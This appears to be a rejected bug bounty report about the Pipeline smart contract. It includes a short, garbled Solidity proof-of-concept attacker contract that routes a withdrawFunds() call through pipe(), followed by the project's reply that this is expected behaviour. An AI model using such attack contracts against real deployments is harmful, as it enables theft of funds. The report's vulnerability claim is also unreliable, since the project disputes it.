Theft of fund with Pipeline
Report ID
#14504
Target
Report type
Smart Contract
Impacts
Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
Has PoC?
Yes
Bug Description
The pipeline contract allows users to call any function on other protocols through the pipe() and multiPipe() functions. This means that an attacker could call a function on another contract that allows them to transfer funds out of that contract.
Impact
allows anyone to withdraw funds, an attacker could call that function through the pipeline contract and steal the funds from the other contract.
Risk Breakdown
Difficulty to Exploit: Medium Weakness: CVSS2 Score: 6
Recommendation
to include a requirement for users to provide proof of ownership of the funds they are attempting to transfer through the pipe() or multiPipe() functions.
Proof of concept
// Attacker contract contract Attacker { // Address of the Pipeline contract address pipelineAddress; // Address of the vulnerable contract address vulnerableAddress;
constructor(address _pipelineAddress, address _vulnerableAddress) public { pipelineAddress = _pipelineAddress; vulnerableAddress = _vulnerableAddress; }
// Function to call the vulnerable contract's withdrawFunds()
function //through the Pipeline contract
function attack() public { // Create a PipeCall struct with the target set to the vulnerable contract's //address and the calldata set to the ABI-encoded withdrawFunds()
//function call PipeCall memory call = PipeCall({ target: vulnerableAddress, data: abi.encodeWithSignature("withdrawFunds()") });
// Call the pipe()
function on the Pipeline contract to execute the function //call on the vulnerable contract, which would allow the attacker to steal all of //the vulnerable contract's funds. IPipeline(pipelineAddress).pipe(call); } }
BIC Response
This is not a security bug report because the report outlines expected functionality. Pipeline was built with the philosophy that it is not the smart contract's role to protect users against misuse. See the Risk section of the Pipeline whitepaper: https://evmpipeline.org/pipeline.pdf#section.6
Due to these reasons, we are closing the submission and no reward will be issued.